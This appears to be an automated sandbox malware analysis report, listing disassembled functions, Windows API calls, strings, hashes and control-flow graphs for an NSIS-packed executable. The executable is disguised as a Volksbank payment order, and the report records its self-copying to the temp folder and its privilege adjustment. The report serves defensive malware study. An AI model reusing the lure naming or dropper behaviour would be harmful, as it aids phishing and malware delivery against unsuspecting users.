                                                                                                                                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",?,?,00000006,?,0000000A), ref: 0040345B
                                                                                                                                                                                                                                            • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,?,?,004033C2,0000000A), ref: 0040664B
                                                                                                                                                                                                                                            • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 00403595
                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,?,0000000A), ref: 004035A6
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 004035B2
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,?,0000000A), ref: 004035C6
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 004035CE
                                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,?,0000000A), ref: 004035DF
                                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 004035E7
                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(1033,?,00000006,?,0000000A), ref: 004035FB
                                                                                                                                                                                                                                            • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,?,0000000A), ref: 0040626C
                                                                                                                                                                                                                                          • OleUninitialize.OLE32(00000006,?,00000006,?,0000000A), ref: 004036C6
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004036E7
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,00000006,?,00000006,?,0000000A), ref: 004036FA
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403709
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403714
                                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe",00000000,00000006,?,00000006,?,0000000A), ref: 00403720
                                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,?,0000000A), ref: 0040373C
                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,?,?,00000006,?,0000000A), ref: 00403796
                                                                                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,0079F6E0,00000001,?,00000006,?,0000000A), ref: 004037AA
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,?,0000000A), ref: 004037D7
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,0000000A,00000006,?,0000000A), ref: 00403806
                                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
                                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
                                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403845
                                                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040388D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe$C:\Users\user\classrooms$C:\Users\user\classrooms\Hematologist$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                          • API String ID: 2488574733-2827411212
                                                                                                                                                                                                                                          • Opcode ID: 9d094df354a64ac00225b874e1f21de582985ea5e934b42c4bdb5f03e135a873
                                                                                                                                                                                                                                          • Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d094df354a64ac00225b874e1f21de582985ea5e934b42c4bdb5f03e135a873
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E
                                                                                                                                                                                                                                          Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 318 402ec1-402f0f GetTickCount GetModuleFileNameW call 405d51 321 402f11-402f16 318->321 322 402f1b-402f49 call 40625f call 405b7c call 40625f GetFileSize 318->322 323 4030f3-4030f7 321->323 330 403036-403044 call 402e5d 322->330 331 402f4f 322->331 338 403046-403049 330->338 339 403099-40309e 330->339 332 402f54-402f6b 331->332 334 402f6d 332->334 335 402f6f-402f78 call 4032f2 332->335 334->335 344 4030a0-4030a8 call 402e5d 335->344 345 402f7e-402f85 335->345 340 40304b-403063 call 403308 call 4032f2 338->340 341 40306d-403097 GlobalAlloc call 403308 call 4030fa 338->341 339->323 340->339 364 403065-40306b 340->364 341->339 369 4030aa-4030bb 341->369 344->339 348 403001-403005 345->348 349 402f87-402f9b call 405d0c 345->349 353 403007-40300e call 402e5d 348->353 354 40300f-403015 348->354 349->354 367 402f9d-402fa4 349->367 353->354 360 403024-40302e 354->360 361 403017-403021 call 40672c 354->361 360->332 368 403034 360->368 361->360 364->339 364->341 367->354 373 402fa6-402fad 367->373 368->330 370 4030c3-4030c8 369->370 371 4030bd 369->371 374 4030c9-4030cf 370->374 371->370 373->354 375 402faf-402fb6 373->375 374->374 376 4030d1-4030ec SetFilePointer call 405d0c 374->376 375->354 377 402fb8-402fbf 375->377 380 4030f1 376->380 377->354 379 402fc1-402fe1 377->379 379->339 381 402fe7-402feb 379->381 380->323 382 402ff3-402ffb 381->382 383 402fed-402ff1 381->383 382->354 384 402ffd-402fff 382->384 383->368 383->382 384->354
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402ED2
                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,00000400,?,00000006,?,0000000A), ref: 00402EEE
                                                                                                                                                                                                                                            • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00405D55
                                                                                                                                                                                                                                            • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,?,0000000A), ref: 00405D77
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe,80000000,00000003,?,00000006,?,0000000A), ref: 00402F3A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • Inst, xrefs: 00402FA6
                                                                                                                                                                                                                                          • Null, xrefs: 00402FB8
                                                                                                                                                                                                                                          • C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
                                                                                                                                                                                                                                          • Error launching installer, xrefs: 00402F11
                                                                                                                                                                                                                                          • soft, xrefs: 00402FAF
                                                                                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
                                                                                                                                                                                                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
                                                                                                                                                                                                                                          • "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe", xrefs: 00402EC1
                                                                                                                                                                                                                                          • vy, xrefs: 00402F4F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                                                                                                                                                                          • API String ID: 4283519449-1778941832
                                                                                                                                                                                                                                          • Opcode ID: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
                                                                                                                                                                                                                                          • Instruction ID: 5e1ca327f74bc56913369b9b8f7861415b50b435560b28898b8d4eae658a22e8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC51F171901209AFDB20AF65DD85B9E7EA8EB4035AF10803BF505B62D5CB7C8E418B5D
                                                                                                                                                                                                                                          Function 0040596D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 385 40596d-405993 call 405c38 388 405995-4059a7 DeleteFileW 385->388 389 4059ac-4059b3 385->389 390 405b29-405b2d 388->390 391 4059b5-4059b7 389->391 392 4059c6-4059d6 call 40625f 389->392 393 405ad7-405adc 391->393 394 4059bd-4059c0 391->394 398 4059e5-4059e6 call 405b7c 392->398 399 4059d8-4059e3 lstrcatW 392->399 393->390 397 405ade-405ae1 393->397 394->392 394->393 400 405ae3-405ae9 397->400 401 405aeb-405af3 call 4065a2 397->401 403 4059eb-4059ef 398->403 399->403 400->390 401->390 409 405af5-405b09 call 405b30 call 405925 401->409 406 4059f1-4059f9 403->406 407 4059fb-405a01 lstrcatW 403->407 406->407 408 405a06-405a22 lstrlenW FindFirstFileW 406->408 407->408 410 405a28-405a30 408->410 411 405acc-405ad0 408->411 425 405b21-405b24 call 4052c3 409->425 426 405b0b-405b0e 409->426 413 405a50-405a64 call 40625f 410->413 414 405a32-405a3a 410->414 411->393 416 405ad2 411->416 427 405a66-405a6e 413->427 428 405a7b-405a86 call 405925 413->428 417 405a3c-405a44 414->417 418 405aaf-405abf FindNextFileW 414->418 416->393 417->413 421 405a46-405a4e 417->421 418->410 424 405ac5-405ac6 FindClose 418->424 421->413 421->418 424->411 425->390 426->400 429 405b10-405b1f call 4052c3 call 406025 426->429 427->418 430 405a70-405a74 call 40596d 427->430 436 405aa7-405aaa call 4052c3 428->436 437 405a88-405a8b 428->437 429->390 439 405a79 430->439 436->418 440 405a8d-405a9d call 4052c3 call 406025 437->440 441 405a9f-405aa5 437->441 439->418 440->418 441->418
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76943420,00000000), ref: 00405996
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?), ref: 004059DE
                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?), ref: 00405A01
                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?), ref: 00405A07
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(007A3F28,?,?,?,0040A014,?,007A3F28,?), ref: 00405A17
                                                                                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405AB7
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00405AC6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • \*.*, xrefs: 004059D8
                                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040597B
                                                                                                                                                                                                                                          • "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe", xrefs: 0040596D
                                                                                                                                                                                                                                          • (?z, xrefs: 004059C6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\Payment_Volksbank_EUR36550-Bestellung -4500673541.com.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                                                                                                                          • API String ID: 2035342205-1891069878
                                                                                                                                                                                                                                          • Opcode ID: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                                                                                                                                                                                                                          • Instruction ID: bed3c70eefbd60b288d0e49403b05a90b1a02306e0e83ed8d7b57435798b36db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d19359472b600334dec94491de2483d8e144fed62e712032587100ce902314ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4341A430900A14AACF21AB65DC89EAF7678EF46724F10827FF406B11D1D77C5981DE6E
                                                                                                                                                                                                                                          Function 004065A2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 665 4065a2-4065b6 FindFirstFileW 666 4065c3 665->666 667 4065b8-4065c1 FindClose 665->667 668 4065c5-4065c6 666->668 667->668
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,007A4F70,fareafvrgende\Djrve27.gud,00405C81,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,00000000,fareafvrgende\Djrve27.gud,fareafvrgende\Djrve27.gud,?,?,76943420,0040598D,?,C:\Users\user\AppData\Local\Temp\,76943420), ref: 004065AD
                                                                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 004065B9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2948860439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948827059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948892668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2948920715.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2949501994.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                          • String ID: fareafvrgende\Djrve27.gud$pOz
                                                                                                                                                                                                                                          • API String ID: 2295610775-1196040977
                                                                                                                                                                                                                                          • Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                                                                                                                          • Instruction ID: ff58ffc18adcfb1e82f863fe631525536c8ca60503d441656b10eafe22cb2dbc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40D012315190206FC6005778BD0C84B7A989F463307158B36B466F11E4D7789C668AA8
                                                                                                                                                                                                                                          Function 00403D1B Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 139 403d1b-403d2d 140 403d33-403d39 139->140 141 403e6e-403e7d 139->141 140->141 142 403d3f-403d48 140->142 143 403ecc-403ee1 141->143 144 403e7f-403ec7 GetDlgItem * 2 call 4041f4 SetClassLongW call 40140b 141->144 147 403d4a-403d57 SetWindowPos 142->147 148 403d5d-403d60 142->148 145 403f21-403f26 call 404240 143->145 146 403ee3-403ee6 143->146 144->143 161 403f2b-403f46 145->161 151 403ee8-403ef3 call 401389 146->151 152 403f19-403f1b 146->152 147->148 154 403d62-403d74 ShowWindow 148->154 155 403d7a-403d80 148->155 151->152 174 403ef5-403f14 SendMessageW 151->174 152->145 160 4041c1 152->160 154->155 157 403d82-403d97 DestroyWindow 155->157 158 403d9c-403d9f 155->158 163 40419e-4041a4 157->163 165 403da1-403dad SetWindowLongW 158->165 166 403db2-403db8 158->166 164 4041c3-4041ca 160->164 168 403f48-403f4a call 40140b 161->168 169 403f4f-403f55 161->169 163->160 176 4041a6-4041ac 163->176 165->164 172 403e5b-403e69 call 40425b 166->172 173 403dbe-403dcf GetDlgItem 166->173 168->169 170 403f5b-403f66 169->170 171 40417f-404198 DestroyWindow EndDialog 169->171 170->171 178 403f6c-403fb9 call 406281 call 4041f4 * 3 GetDlgItem 170->178 171->163 172->164 179 403dd1-403de8 SendMessageW IsWindowEnabled 173->179 180 403dee-403df1 173->180 174->164 176->160 177 4041ae-4041b7 ShowWindow 176->177 177->160 209 403fc3-403fff ShowWindow KiUserCallbackDispatcher call 404216 EnableWindow 178->209 210 403fbb-403fc0 178->210 179->160 179->180 183 403df3-403df4 180->183 184 403df6-403df9 180->184 187 403e24-403e29 call 4041cd 183->187 188 403e07-403e0c 184->188 189 403dfb-403e01 184->189 187->172 192 403e42-403e55 SendMessageW 188->192 194 403e0e-403e14 188->194 189->192 193 403e03-403e05 189->193 192->172 193->187 197 403e16-403e1c call 40140b 194->197 198 403e2b-403e34 call 40140b 194->198 205 403e22 197->205 198->172 207 403e36-403e40 198->207 205->187 207->205 213 404001-404002 209->213 214 404004 209->214 210->209 215 404006-404034 GetSystemMenu EnableMenuItem SendMessageW 213->215 214->215 216 404036-404047 SendMessageW 215->216 217 404049 215->217 218 40404f-40408e call 404229 call 403cfc call 40625f lstrlenW call 406281 SetWindowTextW call 401389 216->218 217->218 218->161 229 404094-404096 218->229 229->161 230 40409c-4040a0 229->230 231 4040a2-4040a8 230->231 232 4040bf-4040d3 DestroyWindow 230->232 231->160 233 4040ae-4040b4 231->233 232->163 234 4040d9-404106 CreateDialogParamW 232->234 233->161 235 4040ba 233->235 234->163 236 40410c-404163 call 4041f4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 234->236 235->160 236->160 241 404165-404178 ShowWindow call 404240 236->241 243 40417d 241->243 243->163
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D57
                                                                                                                                                                                                                                          • ShowWindow.USER32(?), ref: 00403D74
                                                                                                                                                                                                                                          • DestroyWindow.USER32 ref: 00403D88
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DA4
